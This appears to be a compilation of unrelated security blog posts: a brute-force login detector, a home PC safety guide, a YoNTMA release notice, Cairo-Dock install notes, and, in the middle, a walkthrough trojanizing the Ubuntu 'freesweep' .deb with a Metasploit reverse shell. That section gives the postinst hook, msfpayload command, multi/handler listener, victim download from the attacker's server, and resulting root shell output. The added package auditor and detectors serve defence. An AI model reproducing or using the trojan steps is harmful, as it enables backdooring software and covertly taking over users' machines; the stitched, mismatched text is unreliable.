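The last step above is exactly what shows up in a target's logs as a burst of failed logins from one address. As an added example (not part of the original post), here is the defender's side: a sliding-window detector over syslog-style lines from the `login` program, which is what a telnet session goes through. The log lines are constructed for the demo; the hostname, addresses and threshold are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log: six failures from 192.0.2.10 inside 20 seconds (a
# password-guessing run), two slow failures and one success from 198.51.100.7.
SAMPLE_LOG = """\
Sep 16 10:01:02 ubuntu login[2231]: FAILED LOGIN (1) on '/dev/pts/0' from '192.0.2.10' FOR 'root', Authentication failure
Sep 16 10:01:05 ubuntu login[2231]: FAILED LOGIN (2) on '/dev/pts/0' from '192.0.2.10' FOR 'root', Authentication failure
Sep 16 10:01:09 ubuntu login[2240]: FAILED LOGIN (1) on '/dev/pts/1' from '192.0.2.10' FOR 'admin', Authentication failure
Sep 16 10:01:12 ubuntu login[2240]: FAILED LOGIN (2) on '/dev/pts/1' from '192.0.2.10' FOR 'admin', Authentication failure
Sep 16 10:01:15 ubuntu login[2251]: FAILED LOGIN (1) on '/dev/pts/2' from '198.51.100.7' FOR 'bob', Authentication failure
Sep 16 10:01:16 ubuntu login[2255]: FAILED LOGIN (1) on '/dev/pts/0' from '192.0.2.10' FOR 'ubuntu', Authentication failure
Sep 16 10:01:19 ubuntu login[2255]: FAILED LOGIN (2) on '/dev/pts/0' from '192.0.2.10' FOR 'ubuntu', Authentication failure
Sep 16 10:03:40 ubuntu login[2260]: FAILED LOGIN (1) on '/dev/pts/2' from '198.51.100.7' FOR 'bob', Authentication failure
Sep 16 10:03:45 ubuntu login[2260]: LOGIN ON /dev/pts/2 BY bob FROM 198.51.100.7
"""

# Matches the "FAILED LOGIN" line util-linux login emits; other lines are ignored.
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ login\[\d+\]: FAILED LOGIN .* "
    r"from '(?P<src>[^']+)' FOR '(?P<user>[^']*)'"
)


def detect_bruteforce(lines, threshold=5, window_seconds=60, year=2013):
    """Return one alert per source that reaches `threshold` failures inside a
    sliding window: (src, first_failure_hhmmss, failures_in_window, users_tried)."""
    recent = defaultdict(deque)      # src -> timestamps of failures still in window
    users = defaultdict(set)         # src -> usernames tried
    alerts = {}
    for line in lines:
        m = FAILED.search(line)
        if not m:
            continue
        # syslog timestamps carry no year, so one is supplied by the caller
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        src = m["src"]
        window = recent[src]
        window.append(ts)
        users[src].add(m["user"])
        while window and (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()      # drop failures that aged out of the window
        if len(window) >= threshold and src not in alerts:
            alerts[src] = (src, window[0].strftime("%H:%M:%S"),
                           len(window), sorted(users[src]))
    return list(alerts.values())


def scan_sample():
    """Run the detector over the constructed sample above."""
    return detect_bruteforce(SAMPLE_LOG.splitlines())
```

Only the source that crosses the threshold inside the window is reported; the slow, spaced-out failures from the second address never accumulate enough to alert.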

How to Protect Your Computer from Hackers, Spyware and Viruses




How to Protect Your Computer from Hackers:

When you're online, you expose yourself to malicious viruses that have been growing in virulence and ferocity over the last few years. These programs have gone beyond mere annoyances, with the worst kinds disabling your PC; they have become portals for remotely perpetrating more sinister activity that can clandestinely hack into sites, mount denial of service attacks, or steal confidential and personal data for fraudulent financial gain at your expense.

Are these viruses serious enough to cause losses? As a home PC user, you may think that having to reinstall your OS after a virus or malware has brought it down is not really expensive, as you lose just a day or two reinstalling your programs and rebuilding files; but consider that in a business, you could actually lose millions. Just ask ChoicePoint, which took a $6 million charge in 2005 after cyber criminals hacked into its systems and stole sensitive data from thousands of customers. Or the credit card processor CardSystems Solutions, which may yet go out of business after a major security breach at the company's Tucson, Arizona, operations center. In a recent consumer survey among security breach victims, people did not take the loss of their data lightly: more than 60% of respondents indicated that they planned to terminate business relationships with a company that lost the data they had entrusted to it.

In 2004, rootkits were a relatively obscure form of Trojan meant to infect Unix computers. But by 2005, rootkits had become a mainstream security threat after Sony BMG Music Entertainment shipped a few million CDs that contained a rootkit as part of their copy protection scheme. Within a few months, Sony recalled the CDs, but it was too late. According to security experts, rootkits attacking Windows PCs were here to stay.

Most of the viruses on the computer were hidden in files that had been downloaded off the Internet: songs, videos, and movies. I was amazingly surprised that the computer lasted for 2 years with that many viruses! So I gave my dear cousin a serious lesson in how to protect her computer from the dangers of the Internet and I will go through them here for anyone else who might be interested!

1. Install Anti-Virus Software - This should not even have to be listed: if you don't have anti-virus software installed, you're asking for trouble! And if your reason for not installing anti-virus software is that it's too expensive, then that reason can be shot down, because there are several free anti-virus programs out there that are considered better than commercial software packages. Here are some of the most popular ones:

AVG Anti-Virus – Very good and completely free.

Avast Anti-Virus – Almost on par with AVG.

Kaspersky Anti-Virus – Not free, but one of the best detection rates.

2. Update All Software - Installing an anti-virus program by itself is not enough. Hundreds of new threats are found daily, and anti-virus programs release updates regularly to combat them. Make sure your anti-virus program is set to update automatically so that you don't have to rely on your memory to do it. This goes for all the software on your computer, too. The most important software to keep up to date is your Windows operating system: it is essential to have Automatic Updates turned on and set to download and install updates automatically.

3. Install only Trusted Software - If you're not sure what a piece of software does from its name, then don't install it. Also, don't install anything you didn't intend to install in the first place. Sometimes programs will ask you to install other programs during the install of the first application. Be careful of that, because it's usually spyware. Install software from big-name sites only, such as Microsoft or Adobe.

4. Avoid P2P File Sharing Software – If used with great caution, P2P software is quite useful for movies, songs and software, but if you’re not very technically savvy, you might end up downloading a song that has a keystroke logger attached to it that will send anything you type to some other computer over the Internet. It’s almost impossible to tell that this is occurring unless your anti-virus or anti-spyware programs pick it up in their scans.

5. Delete Unknown Emails – If you receive emails from random people's names, do not bother to open them, just delete them. If you have any doubts after reading the name and the subject, it's probably not someone you know. Never download or open attachments unless you are sure they're from someone you know. Give the person a quick call and ask them if you're not sure. Most large companies that you create online accounts with will not send you attachments unless you specifically ask for them through their web site. Also, be wary of any emails from sites pretending to be banks, auction sites, etc., asking you to verify bank account info or address info. No bank ever does that.

6. Do not click on Ads - Avoid clicking on ads if you can. Especially those ads where something is flying around and if you shoot the duck, you win some prize! Ads have become more sophisticated in that they try to make the ad interactive so that you’ll be tempted to play it like a game.

7. Run Virus Scans Regularly – If you're not in the mood to scan every day, at least run a scan once a week. Better still, set up a schedule in your anti-virus software to run a scan late at night or whenever you don't use your computer, so that you won't be bothered by a slow computer.

8. Be careful what you attach to your computer – This is a more common way to transfer viruses than you might think. Everyone now has a USB flash stick that they carry around on their key chain, ready to snap into any computer. But who knows what viruses are on your friends' computers and what accidentally got transferred to their USB sticks. A lot of virus programs will auto-launch right when the USB stick is put into the computer, so you don't even have to open or download any of the files to be infected.

9. Avoid Shady Web Sites – If you need to look at porn, then make sure you do it in a virtual environment. You are DEFINITELY going to get some virus or spyware if you browse porn sites on your computer. Virtualization basically allows you to run programs like Internet Explorer in a virtual environment that does not affect your current operating system. If you want to find out more, search for "Virtual PC" or "VMware" in Google. Otherwise, simply avoid going to shady web sites!

10. Turn On or Install a Firewall - If you’re running Windows XP, make sure Windows Firewall is turned on. A firewall prevents hackers from gaining access to your computer by limiting the number of ports that are open to the public. Also, when buying a wireless router, make sure it has a built in firewall. Having a software and hardware firewall is better than just having one or the other.

11. Secure Your Wireless Network – Most wireless routers are set to no security when you install them. Be sure to log into the router and at least set the basic security that requires a password. There are stronger encryption options, but if you don’t understand those, then simply set a password on the router, otherwise anyone can connect to your home network and access everything.

12. Use a Complex Password for Login – This means that you should already have a password to login to your computer. Not having a password at all is not a good idea. Create a password for all user accounts and make sure it’s complex. Complex means it should have numbers, upper case characters, lower case characters, and symbols. This makes it way more difficult for a hacker to get into your computer.

YoNTMA - A tool to protect your encrypted data




You're a responsible defender of your data. You keep all of your disks encrypted. You hibernate your laptop when you're not using it to keep any sensitive data out of RAM. You're known by friends, family, and colleagues as a tireless crusader against data theft. But do you hibernate your laptop when you visit a co-worker's office for a few minutes? What about when you get up to use the bathroom? What happens if a thief snatches your laptop while it's locked, but still powered on? The encryption keys are still in memory, which makes them vulnerable to DMA or cold boot attacks. Once the thief has the data encryption keys, they effectively have physical access to an unencrypted laptop, which means game over for your data.

Enter YoNTMA! YoNTMA (You'll Never Take Me Alive!) is a tool designed to enhance the protection of encrypted data. YoNTMA runs as a background service and begins monitoring your computer any time the screen is locked. If the power cable or Ethernet cable is disconnected from the system while your laptop is locked, YoNTMA will immediately hibernate the machine to ensure that the disk encryption keys do not remain in RAM. This ensures that if a thief walks off with your powered-on laptop, your encrypted data stays protected.

iSEC Partners is pleased to announce the first public release of YoNTMA. The project is hosted on GitHub at the following URL 

Try it out and let us know what features you'd like to see or any other feedback you have on the Issues page.
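The rule described above is small enough to write down as a state machine. This is an added illustration, not YoNTMA's own code: the `hibernate` callback stands in for the platform hook a real service would implement per OS, and the event names are assumptions. The design point it carries is that only a connected-to-disconnected transition while the screen is locked counts; a cable that was already unplugged when the screen locked is not evidence of theft.

```python
class LockedTamperGuard:
    """Arms itself on screen lock; hibernates when a cable is pulled while armed."""

    CABLES = ("power", "ethernet")

    def __init__(self, hibernate):
        self.hibernate = hibernate          # hypothetical platform hook (assumption)
        self.locked = False
        self.connected = {c: True for c in self.CABLES}   # last reported cable state
        self.hibernated = False

    def on_event(self, kind, value=None):
        """kind: 'lock' | 'unlock' | 'power' | 'ethernet'; value: True if connected.

        Returns True once a hibernate has been requested for the current lock."""
        if kind == "lock":
            self.locked = True
        elif kind == "unlock":
            self.locked = False
            self.hibernated = False         # the next lock re-arms the guard
        elif kind in self.connected:
            before, self.connected[kind] = self.connected[kind], bool(value)
            # Only a connected -> disconnected transition while locked is a
            # tamper signal. A cable already unplugged before the lock, or a
            # cable being plugged back in, never triggers a hibernate.
            if self.locked and before and not value and not self.hibernated:
                self.hibernated = True
                self.hibernate(f"{kind} cable disconnected while screen locked")
        else:
            raise ValueError(f"unknown event {kind!r}")
        return self.hibernated


def replay(events):
    """Feed (kind, value) events to a fresh guard; return the hibernate reasons fired."""
    fired = []
    guard = LockedTamperGuard(fired.append)
    for kind, value in events:
        guard.on_event(kind, value)
    return fired
```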

Thursday, 30 May 2013

Binary Linux Trojan


Binary Trojans are not exclusive to the Windows world: we will package a Metasploit payload with an Ubuntu deb package to give us a shell on Linux. An excellent video was made by Redmeat_uk demonstrating this technique, which you can view at http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx

We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package 'freesweep', a text-based version of Minesweeper.

root@kali:~# apt-get --download-only install freesweep
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
root@kali:~# mkdir /tmp/evil
root@kali:~# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
root@kali:~# cd /tmp/evil/
root@kali:/tmp/evil#


Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added "features".

root@kali:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work
root@kali:/tmp/evil# mkdir work/DEBIAN


In the 'DEBIAN' directory, create a file named 'control' that contains the following:
root@kali:/tmp/evil/work/DEBIAN# nano control

Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper

We also need to create a post-installation script that will execute our binary. In our 'DEBIAN' directory, we'll create a file named 'postinst' that contains the following:
root@kali:/tmp/evil/work/DEBIAN# cat postinst

#!/bin/sh
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &

Now we'll create our malicious payload. We'll be creating a reverse shell to connect back to us named 'freesweep_scores'.

root@kali:~# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=192.168.1.101,LPORT=443


We'll now make our post-installation script executable and build our new package. The built file will be named 'work.deb' so we will want to change that to 'freesweep.deb' and copy the package to our web root directory.

root@kali:/tmp/evil/work/DEBIAN# chmod 755 postinst
root@kali:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.
root@kali:/tmp/evil# mv work.deb freesweep.deb
root@kali:/tmp/evil# cp freesweep.deb /var/www/

If it is not already running, we'll need to start the Apache web server.
root@kali:/tmp/evil# service apache2 start


We will need to set up the Metasploit multi/handler to receive the incoming connection.

root@kali:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.105 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...


On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game.

ubuntu@ubuntu:~$ wget http://192.168.1.105/freesweep.deb

ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb


As the victim installs and plays our game, we have received a shell!

[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129)

ifconfig
eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:49 errors:0 dropped:0 overruns:0 frame:0
TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
Interrupt:17 Base address:0x1400
...snip...

hostname
ubuntu
id
uid=0(root) gid=0(root) groups=0(root)
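Everything the walkthrough above relies on lives in the package's maintainer scripts, which run as root at install time, so that is where a defender looks before trusting a .deb that did not come from a signed repository. The following is an added example, not Metasploit or dpkg code: it parses the .deb container itself (an `ar` archive holding `debian-binary`, `control.tar.*` and `data.tar.*`), pulls the maintainer scripts out of the control tarball, and flags the constructs the postinst above uses. The minimal package it audits is constructed in memory for the demo.

```python
import io
import re
import tarfile

AR_MAGIC = b"!<arch>\n"

def ar_members(blob):
    """Yield (name, data) for each member of an 'ar' archive, the .deb container."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive / .deb file")
    pos = len(AR_MAGIC)
    while pos + 60 <= len(blob):           # every member has a 60-byte header
        hdr = blob[pos:pos + 60]
        name = hdr[0:16].decode().strip().rstrip("/")
        size = int(hdr[48:58].decode().strip())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)      # member data is padded to an even length

def maintainer_scripts(deb_blob):
    """Return {name: text} for the maintainer scripts found in control.tar.*."""
    scripts = {}
    for name, data in ar_members(deb_blob):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
            for member in tar.getmembers():
                base = member.name.split("/")[-1]
                if member.isfile() and base in ("preinst", "postinst", "prerm", "postrm"):
                    scripts[base] = tar.extractfile(member).read().decode()
    return scripts

# Constructs worth a human look; each one appears in the postinst shown above.
RISKY = [
    (re.compile(r"\bchmod\s+(?:[2-7]\d{3}|[ugoa]*\+[rwx]*s)\b"), "setuid/setgid bit set"),
    (re.compile(r"(?<!&)&\s*$"), "command left running in the background"),
    (re.compile(r"\bsudo\b"), "sudo used in a script that already runs as root"),
]

def audit_scripts(scripts):
    """Return [(script, line_number, reason)] for every risky construct found."""
    findings = []
    for script, text in scripts.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            for pattern, reason in RISKY:
                if pattern.search(line):
                    findings.append((script, lineno, reason))
    return findings

def build_sample_deb(postinst_text):
    """Construct a minimal .deb in memory (a demo sample, not a real package)."""
    control = io.BytesIO()
    with tarfile.open(fileobj=control, mode="w:gz") as tar:
        for name, body in (("./control", "Package: freesweep\nVersion: 0.90-1\n"),
                           ("./postinst", postinst_text)):
            info = tarfile.TarInfo(name)
            info.size, info.mode = len(body.encode()), 0o755
            tar.addfile(info, io.BytesIO(body.encode()))
    def member(name, data):                # one ar member: 60-byte header + data
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        return hdr + data + (b"\n" if len(data) % 2 else b"")
    return (AR_MAGIC + member("debian-binary", b"2.0\n")
            + member("control.tar.gz", control.getvalue()) + member("data.tar.gz", b""))

# The postinst from the walkthrough above, as the audit would see it.
SAMPLE_POSTINST = ("#!/bin/sh\nsudo chmod 2755 /usr/games/freesweep_scores && "
                   "/usr/games/freesweep_scores & /usr/games/freesweep &\n")
```

`audit_scripts(maintainer_scripts(build_sample_deb(SAMPLE_POSTINST)))` reports all three constructs on line 2 of postinst, while a conventional postinst that only calls `update-menus` produces no findings.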



How to install Dock in Kali Linux


Install Dock in Kali Linux

Cairo-Dock is a pretty, fast and customizable desktop interface. You can see it as a good alternative or addition to Unity, Gnome-Shell, Xfce-panel, KDE-panel, etc.
Here is a short summary of the improvements and new features in version 3.1. Cairo-Dock sits at the centre of your desktop, allowing you to monitor and control your favourite apps: music players, chat messengers, Twitter, torrent downloaders, RSS feeds, calendar/tasks, weather, mail checkers, etc., plus a powerful taskbar.

Cairo Dock includes many plugins/applets such as: weather, clock, Messaging Menu, system monitor, keyboard indicators, custom icons, notification area, clipboard manager, and many other plugins.

What's New in Cairo Dock?
Main Changes:

  • Better integration of Unity: support of the Launcher API and better support of indicators

  • All configuration windows have been merged into a single one.

  • Added progress bars in several applets and in the Dbus API

  • The Music Player applet can control players in the systray.

  • Taskbar icons can now be separated from launchers, or not, as you prefer.

  • The advanced mode of the configuration panel has been improved (thanks to SQP!)

  • Messaging Menu has been rewritten for newer versions and two new 'indicator' applets have been added:

  • Printers-Menu: it shows active print jobs.

  • and Sync-Menu: e.g. on Ubuntu 12.10, it collects status information from processes that involve some form of synchronisation with servers, such as apps like Ubuntu One.

  • Various bug fixes and improvements.


Core:

  • The dock now supports XRandr which should replace Xinerama and help the dock to manage multi-monitors.

  • Progress bars can now be customised (in the advanced mode of the configuration panel / 'Indicators' module).

  • We can drop .sh files into the dock to quickly create a new launcher.

  • The "Lock icons position" now only block the icons position but we can still add new launchers/files from the menu/file manager.

  • QuickList menu entries are now translated if it's available.

  • We can now launch the dock with '-W' (--metacity-workaround) option which is a workaround for window managers (e.g. Metacity) not handling the opacity correctly (if your subdock/dock/dialogues are invisible).

  • Window's actions have been merged into a single menu entry (right-click menu).

  • The default view now use all the screen space to avoid the jitter of the dock when it is resized (visible only if your window manager doesn't resize it correctly).

  • Labels in vertical dock now ends with a gradation.

  • The dock now supports animated images with variable rate (have a look to the new 'Busy' animation when the Weather applet is downloading data or when you're uploading files with the 'Drop to Share' applet).


Plug-ins:

  • Clock: We can now easily add a new task by doing a right click on the calendar.

  • Drop to Share: now supports text files (it uploads the content of text files to servers like pastebin).

  • Applications Menu: uses gio to launch the menu entries, so that the event is stored in Zeitgeist.

  • Mail: Improved the look of the icon and its dialogue.

  • MusicPlayer: no longer displays quicklists, since the applet already provides all the common actions for any player.

  • Notification Area: displays the title, the label and the description (if they are available) on the label of the icon.

  • PowerManager: displays the details of all batteries (not only the first one) and changes the icon if a battery is removed or added.

  • QuickBrowser: Added drag support (e.g. to quickly drop a file into GMail in order to attach it to the mail).

  • Recent-Events: prevents double entries in the menu list and hides unavailable files.

  • Recent Events: added recent applications.

  • Shortcuts: added the possibility to launch nautilus-connect-server from its menu.

  • Shortcuts: Moved the 'Home' directory to the bookmark list.

  • Stack: it now supports all URI types, not only files from the file system but also files from servers or even from the trash.

  • Switcher: Added new options and reorganised the list of options. Now we can have a very simple drawing (like the Switcher applet of the Gnome-Panel).

  • Added an option to have progress bars in a few applets (Sound Control, Wifi, PowerManager, etc.).


Other Changes:

  • A new 'third-party' applet is available: YoutubeDL to easily download Youtube videos (thanks to Brian).

  • Twitter applet now supports Identi.ca.

  • 3 new themes are available.

  • The code has been cleaned in order to remove most warnings when we compile it with -Wall (and -Wextra for the core).

  • Translations have been updated.


Installation with one copy-paste


If you don't want to learn more about the installation, or if you want a quick install of the dock, copy-paste all of this box into a terminal.
(Note: the 2nd line is long and may be displayed as 2 lines on the page, but it's a single line.)

  • sudo -v


Please type your password (it's invisible).

  • echo "deb http://download.tuxfamily.org/glxdock/repository/ubuntu $(lsb_release -sc) cairo-dock" | sudo tee -a /etc/apt/sources.list



  • wget -q http://download.tuxfamily.org/glxdock/repository/cairo-dock.gpg -O- | sudo apt-key add -



  • sudo apt-get update



  • sudo apt-get install cairo-dock cairo-dock-plug-ins # or if the dock is already installed => # sudo apt-get dist-upgrade